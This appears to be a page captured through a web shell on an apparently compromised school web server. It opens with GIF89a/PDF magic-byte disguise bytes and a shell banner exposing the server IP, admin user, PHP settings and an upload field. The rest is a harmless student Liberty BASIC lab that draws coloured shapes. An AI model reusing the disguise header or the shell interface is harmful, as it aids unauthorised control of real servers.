GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/_Archive/CST1794/ |
Upload File : |
nomainwin WindowWidth = 500 WindowHeight = 500 open "Lab14" for graphics as #graphWin print #graphWin ,"backcolor black" print #graphWin ,"horizscrollbar off" print #graphWin ,"vertscrollbar off" print #graphWin ,"fill black" print #graphWin ,"flush" 'Blue circle print #graphWin ,"size 1; color blue; backcolor blue" print #graphWin ,"home; north; up; go 100; down; circlefilled 50" print #graphWin ,"flush" 'Orange circle print #graphWin ,"size 1; color 255 127 0; backcolor 255 127 0" print #graphWin ,"home; north; up; turn 180; go 100; down; circlefilled 50" print #graphWin ,"flush" 'Red box print #graphWin ,"size 1; color red; backcolor red" print #graphWin ,"home; north; up; go 50; turn 90; go 50" print #graphWin ,"posxy xVar yVar" print #graphWin ,"down; boxfilled ";xVar+100;" "; yVar+100 print #graphWin ,"flush" 'Green elipse print #graphWin ,"size 1; color Green; backcolor Green" print #graphWin ,"home; north; up; turn 270; go 100; down; ellipsefilled 120 80" print #graphWin ,"flush" print #graphWin ,"home; north; up; go 100; size 1; color white; down; circle 3" print #graphWin ,"home; north; up; turn 90; go 100; size 1; color white; down; circle 3" print #graphWin ,"home; north; up; turn 180; go 100; size 1; color white; down; circle 3" print #graphWin ,"home; north; up; turn 270; go 100; size 1; color white; down; circle 3" print #graphWin ,"flush" print #graphWin, "trapclose [quit]" WAIT [quit] CONFIRM "quit?"; quit$ if quit$ = "no" then WAIT close #graphWin end